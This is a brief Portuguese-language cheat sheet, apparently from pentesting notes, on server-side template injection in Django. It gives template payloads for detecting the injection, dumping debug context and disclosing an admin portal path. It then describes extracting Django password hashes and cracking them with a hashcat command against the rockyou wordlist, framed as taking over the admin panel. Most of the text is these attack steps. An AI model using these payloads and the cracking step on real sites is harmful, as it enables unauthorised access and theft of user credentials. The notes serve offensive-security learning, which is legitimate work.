Injeção de Modelo no Servidor

Detecção: {% if 'ahsan' == 'ahsan' %} a {% endif %}

Depuração: {% debug %}

Divulgando Portal do Admin: {% include 'admin/base.html' %} = /secret-admin-portal

Divulgando Credenciais:

Credenciais com hash do Django Descartadas

Descriptografado usando Hashcat:

hashcat -m 10000 hashed_passwords rockyou. txt = Django Admin Panel Pwn

Last updated